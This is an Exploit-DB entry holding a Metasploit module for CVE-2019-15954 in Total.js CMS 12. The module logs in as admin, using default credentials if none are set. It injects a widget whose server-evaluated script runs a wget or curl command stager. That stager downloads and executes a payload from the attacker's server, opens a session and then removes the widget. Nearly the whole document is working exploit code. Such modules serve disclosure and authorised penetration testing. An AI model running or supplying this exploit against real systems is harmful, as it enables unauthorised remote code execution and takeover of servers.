Total.js CMS 12 - Widget JavaScript Code Injection (Metasploit)

EDB-ID:

47531




Platform:

Multiple

Date:

2019-10-22


##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::CmdStager

  # Declares the module metadata (name, authors, targets, references, notes)
  # and registers the options a user can set for this module.
  #
  # @param info [Hash] metadata handed to update_info together with the
  #   values defined here
  def initialize(info = {})
    credits = [
      'Riccardo Krauter', # Original discovery
      'sinn3r'            # Metasploit module
    ]

    # Each target pairs a platform with the command stager flavor used for it.
    supported_targets = [
      ['Total.js CMS on Linux', { 'Platform' => 'linux', 'CmdStagerFlavor' => 'wget' }],
      ['Total.js CMS on Mac', { 'Platform' => 'osx', 'CmdStagerFlavor' => 'curl' }]
    ]

    advisories = [
      ['CVE', '2019-15954'],
      ['URL', 'https://seclists.org/fulldisclosure/2019/Sep/5'],
      ['URL', 'https://github.com/beerpwn/CVE/blob/master/Totaljs_disclosure_report/report_final.pdf']
    ]

    module_notes = {
      'SideEffects' => [IOC_IN_LOGS],
      'Reliability' => [REPEATABLE_SESSION],
      'Stability' => [CRASH_SAFE]
    }

    module_info = {
      'Name' => 'Total.js CMS 12 Widget JavaScript Code Injection',
      'Description' => %q{
        This module exploits a vulnerability in Total.js CMS. The issue is that a user with
        admin permission can embed a malicious JavaScript payload in a widget, which is
        evaluated server side, and gain remote code execution.
      },
      'License' => MSF_LICENSE,
      'Author' => credits,
      'Arch' => [ARCH_X86, ARCH_X64],
      'Targets' => supported_targets,
      'References' => advisories,
      'DefaultOptions' => { 'RPORT' => 8000 },
      'Notes' => module_notes,
      'Privileged' => false,
      'DisclosureDate' => '2019-08-30', # Reported to seclist
      'DefaultTarget' => 0
    }

    super(update_info(info, module_info))

    module_options = [
      OptString.new('TARGETURI', [true, 'The base path for Total.js CMS', '/']),
      OptString.new('TOTALJSUSERNAME', [true, 'The username for Total.js admin', 'admin']),
      OptString.new('TOTALJSPASSWORD', [true, 'The password for Total.js admin', 'admin'])
    ]
    register_options(module_options)
  end

  # Holds the value of the `__admin` cookie extracted from a cookie string.
  class AdminToken
    attr_reader :token

    # @param cookie [String] cookie string to search; the token is the
    #   alphanumeric value of the first `__admin=...;` pair, or nil when no
    #   such pair is present
    def initialize(cookie)
      @token = cookie[/__admin=([a-zA-Z\d]+);/, 1]
    end

    # @return [Boolean] whether no token was extracted
    def blank?
      @token.blank?
    end
  end

  # Value object describing the widget that gets submitted to the CMS: a
  # generated name, a fixed category, and the widget body.
  class Widget
    attr_reader :name, :category, :source_code, :platform, :url

    # @param p [Object] platform identifier, stored unchanged
    # @param u [String] URL, stored unchanged
    # @param stager [String] command line placed inside the widget body
    def initialize(p, u, stager)
      @platform = p
      @url = u
      @category = 'content'
      # The "p_" prefix followed by ten random letters.
      @name = "p_#{Rex::Text.rand_text_alpha(10)}"
      @source_code = [
        %Q|<script total>|,
        %Q|global.process.mainModule.require('child_process')|,
        %Q|.exec("sleep 2;#{stager}");|,
        %Q|</script>|
      ].join
    end
  end

  # Fingerprints the target by requesting the admin widgets page and looking
  # at the X-Powered-By header and the version advertised in the page title.
  #
  # @return [CheckCode] Unknown when there is no response; Detected when only
  #   the Total.js header is seen; Appears when the advertised version is 12 or
  #   lower; Safe otherwise
  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, 'admin', 'widgets')
    })

    unless res
      vprint_error('Connection timed out')
      return CheckCode::Unknown
    end

    # If the admin's login page is visited too many times, we will start getting
    # a 401 (unauthorized response). In that case, we only have a header to work
    # with.
    code = CheckCode::Safe
    if res.headers['X-Powered-By'].to_s == 'Total.js'
      code = CheckCode::Detected
    end

    # If we are here, then that means we can still see the login page.
    # Let's see if we can extract a version.
    html = res.get_html_document
    element = html.at('title')
    return code unless element.respond_to?(:text)

    # Capture only a well-formed dotted-decimal version. A looser pattern would
    # also pick up trailing punctuation (e.g. "12.0.0."), which Gem::Version
    # rejects with an ArgumentError and would abort the check.
    title = element.text.scan(/CMS v(\d+(?:\.\d+)*)/).flatten.first
    return code unless title
    version = Gem::Version.new(title)

    if version <= Gem::Version.new('12')
      # If we are able to check the version, we could try the default cred and attempt
      # to execute malicious code and see how the application responds. However, this
      # seems to be a bit too aggressive so I'll leave that to the exploit part.
      return CheckCode::Appears
    end

    CheckCode::Safe
  end

  # Logs in to the admin API and extracts the admin token from the response
  # cookies. The token is also stored in @admin_token.
  #
  # Calls fail_with when there is no response or when the JSON body is not a
  # hash carrying a truthy 'success' value.
  #
  # @param user [String] admin username
  # @param pass [String] admin password
  # @return [AdminToken] token built from the response cookies
  def auth(user, pass)
    json_body = { 'name' => user, 'password' => pass }.to_json

    res = send_request_cgi({
      'method' => 'POST',
      # Use only the path component of TARGETURI, as every other request in
      # this module does, so a query or fragment cannot end up in the path.
      'uri'    => normalize_uri(target_uri.path, 'api', 'login', 'admin'),
      'ctype'  => 'application/json',
      'data'   => json_body
    })

    unless res
      fail_with(Failure::Unknown, 'Connection timed out')
    end

    json_res = res.get_json_document
    cookies = res.get_cookies
    # If it's an array it could be an error, so we are specifically looking for a hash.
    if json_res.kind_of?(Hash) && json_res['success']
      token = AdminToken.new(cookies)
      @admin_token = token
      return token
    end
    fail_with(Failure::NoAccess, 'Invalid username or password')
  end

  # Builds a Widget whose body carries the command stager and submits it to
  # the admin widgets API.
  #
  # Calls fail_with when there is no response or when the JSON body is not a
  # hash carrying a truthy 'success' value.
  #
  # @param admin_token [AdminToken] token sent in the __admin cookie
  # @return [Widget] the widget that was submitted
  def create_widget(admin_token)
    payload_name = "p_#{Rex::Text.rand_text_alpha(5)}"
    resource_path = "#{get_resource}/#{payload_name}"

    # A wildcard SRVHOST is replaced by the address Rex reports as the source.
    srv_host = datastore['SRVHOST']
    srv_host = Rex::Socket::source_address if srv_host == '0.0.0.0'
    scheme = datastore['SSL'] ? 'https' : 'http'
    payload_url = "#{scheme}://#{srv_host}:#{datastore['SRVPORT']}#{resource_path}"

    stager_command = generate_cmdstager(
      'Path' => resource_path,
      'temp' => '/tmp',
      'file' => payload_name
    ).join(';')

    widget = Widget.new(target.platform.names.first, payload_url, stager_command)

    request = {
      'method' => 'POST',
      'uri'    => normalize_uri(target_uri.path, 'admin', 'api', 'widgets'),
      'cookie' => "__admin=#{admin_token.token}",
      'ctype'  => 'application/json',
      'data'   => {
        'name'     => widget.name,
        'category' => widget.category,
        'body'     => widget.source_code
      }.to_json
    }
    res = send_request_cgi(request)

    fail_with(Failure::Unknown, 'Connection timed out') unless res

    reply = res.get_json_document
    unless reply.kind_of?(Hash) && reply['success']
      fail_with(Failure::Unknown, 'No success message in body')
    end
    print_good("Widget created successfully")

    widget
  end

  # Fetches the widget list from the admin API and returns the entry that
  # belongs to the given widget.
  #
  # Only an entry whose name equals widget.name is returned. Matching on the
  # "p_" prefix alone would also select unrelated widgets whose names merely
  # contain "p_" (for example "top_posts").
  #
  # Calls fail_with when there is no response, when the body is not a JSON
  # object, or when the 'count' or 'items' keys are missing.
  #
  # @param admin_token [AdminToken] token sent in the __admin cookie
  # @param widget [Widget] the widget to look for
  # @return [Hash, Array] the matching list entry, or an empty array when no
  #   entry matches
  def get_widget_item(admin_token, widget)
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, 'admin', 'api', 'widgets'),
      'cookie' => "__admin=#{admin_token.token}",
      'ctype'  => 'application/json'
    })

    unless res
      fail_with(Failure::Unknown, 'Connection timed out')
    end

    res_json = res.get_json_document
    # Indexing an array body with a string key would raise a TypeError.
    unless res_json.kind_of?(Hash)
      fail_with(Failure::Unknown, 'Unexpected JSON body in widget list response')
    end

    count = res_json['count']
    items = res_json['items']

    unless count
      fail_with(Failure::Unknown, 'No count key found in body')
    end

    unless items
      fail_with(Failure::Unknown, 'No items key found in body')
    end

    wanted_name = widget.respond_to?(:name) ? widget.name : nil
    # Without a name there is nothing to match; never fall back to a guess.
    return [] unless wanted_name

    found = items.find do |item|
      item.kind_of?(Hash) && item['name'] == wanted_name
    end

    found || []
  end

  # Removes the widget created by this module from the CMS.
  #
  # Looks the widget up in the widget list and sends a DELETE request built
  # from the list entry. When no token or widget was recorded, or the widget
  # is not in the list, a warning is printed and nothing is deleted.
  #
  # Calls fail_with when the DELETE request gets no response or the JSON body
  # is not a hash carrying a truthy 'success' value.
  def clear_widget
    admin_token = get_admin_token
    widget = get_widget

    unless admin_token && widget
      print_warning('No widget was recorded for this run, skipping cleanup')
      return
    end

    print_status('Finding the payload from the widget list...')
    item = get_widget_item(admin_token, widget)

    # The lookup yields a non-Hash value when nothing matched; indexing that
    # with string keys would raise instead of reporting the situation.
    unless item.kind_of?(Hash)
      print_warning("Widget #{widget.name} was not found in the widget list, it may need to be removed manually")
      return
    end

    json_body = {
      'id'          => item['id'],
      'picture'     => item['picture'],
      'name'        => item['name'],
      'icon'        => item['icon'],
      'category'    => item['category'],
      'datecreated' => item['datecreated'],
      'reference'   => item['reference']
    }.to_json

    res = send_request_cgi({
      'method' => 'DELETE',
      'uri'    => normalize_uri(target_uri.path, 'admin', 'api', 'widgets'),
      'cookie' => "__admin=#{admin_token.token}",
      'ctype'  => 'application/json',
      'data'   => json_body
    })

    unless res
      fail_with(Failure::Unknown, 'Connection timed out')
    end

    res_json = res.get_json_document
    if res_json.kind_of?(Hash) && res_json['success']
      print_good("Widget cleared successfully")
    else
      fail_with(Failure::Unknown, 'No success message in body')
    end
  end

  # Handles a request to the module's HTTP server: requests whose URI matches
  # the payload naming pattern receive the generated executable, everything
  # else gets a not-found reply.
  #
  # @param cli [Object] client connection; its peerhost is logged
  # @param req [Object] incoming request; its uri decides the reply
  def on_request_uri(cli, req)
    requester = cli.peerhost
    print_status("#{requester} requesting: #{req.uri}")

    return send_not_found(cli) unless req.uri =~ /p_.+/

    executable = generate_payload_exe(code: payload.encoded)
    print_status("Sending payload to #{requester}")
    send_response(cli, executable, { 'Content-Type' => 'application/octet-stream' })
    nil
  end

  # Removes the created widget once a session has been opened. The session
  # argument itself is not used.
  #
  # NOTE(review): presumably invoked by the framework as a session callback;
  # confirm against the exploit base class.
  def on_new_session(session)
    clear_widget
  end

  # Returns the widget stored in @widget. This exists for cleaning up the
  # widget, because we cannot pass it as an argument in on_new_session.
  #
  # @return [Widget, nil] the stored widget, or nil when none has been stored
  def get_widget
    @widget
  end

  # Returns the token stored in @admin_token. This also exists for cleaning up
  # the widget, because we cannot pass the token as an argument directly.
  #
  # @return [AdminToken, nil] the stored token, or nil when none has been stored
  def get_admin_token
    @admin_token
  end

  # Module entry point: authenticates with the configured admin credentials,
  # creates the widget, stores it in @widget for later cleanup, and then hands
  # over to the parent implementation.
  #
  # Calls fail_with when authentication yields a blank token.
  def exploit
    user = datastore['TOTALJSUSERNAME']
    pass = datastore['TOTALJSPASSWORD']
    print_status("Attempting to authenticate with #{user}:#{pass}")
    admin_token = auth(user, pass)
    fail_with(Failure::Unknown, 'No admin token found') if admin_token.blank?
    print_good("Authenticated as: #{user}:#{pass}")
    print_status("Creating a widget...")
    # Kept on the instance because the cleanup path cannot receive it as an argument.
    @widget = create_widget(admin_token)
    super
  end

end